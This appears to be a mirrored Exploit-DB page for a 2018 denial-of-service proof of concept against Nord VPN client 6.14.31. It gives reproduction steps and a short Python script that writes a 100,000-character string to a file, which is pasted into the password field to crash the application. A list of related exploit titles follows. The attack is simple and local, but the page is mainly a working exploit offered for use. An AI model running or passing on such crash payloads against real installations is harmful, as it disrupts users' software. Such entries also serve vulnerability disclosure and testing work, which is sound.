Nord VPN 6.14.31 – Denial of Service (PoC)

Exploit Database
97 阅读

作者： L0RD

日期： 2018-08-30
类别：
- dos
平台：
- windows_x86-64
来源：https://www.exploit-db.com/exploits/45304/

# Exploit Title: Nord VPN <= 6.14.31 - Denial of Service (PoC)
# Exploit Author : L0RD (borna nematzadeh)
# Contact: borna.nematzadeh123@gmail.com
# Date: 2018-08-30
# Vendor Homepage : https://nordvpn.com
# Software link: https://nordvpn.com/download/
# Version: <= 6.14.31
# Tested on: Windows 10
# CVE: N/A

# Steps to reproduce:
# 1) Run the python exploit code and open "nord.txt" file
# 2) Copy the content of file
# 3) Open Nord vpn
# 4) Put anything (like test@test.com) into username field and paste content of "nord.txt" into password
# 5) Crash!

#!/usr/bin/python

buffer = "\x41" * 100000
f = open ("nord.txt", "w")
f.write(buffer)
f.close()
print "File created"

last Exploits
Nord VPN 6.14.31 – Denial of Service (PoC)的更多信息

SpotDialup 1.6.7 – ‘Name’ Denial of Service (PoC)：
OBS Studio 20.1.3 – Local Buffer Overflow：
PHP 5.3.x ‘Intl’ Extension – ‘NumberFormatter::setSymbol()’ Denial of Service：
Symantec AntiVirus – Missing Bounds Checks in dec2zip ALPkOldFormatDecompressor::UnShrink：
Microsoft Windows – ‘IOCTL_VOLUME_GET_VOLUME_DISK_EXTENTS’ volmgr Pool Memory Disclosure：
Microsoft Visio 2010 – Crash (PoC)：
Microsoft Windows – SMB2 Negotiate Protocol ‘0x72’ Response Denial of Service：
LanWhoIs.exe 1.0.1.120 – Stack Buffer Overflow (PoC)：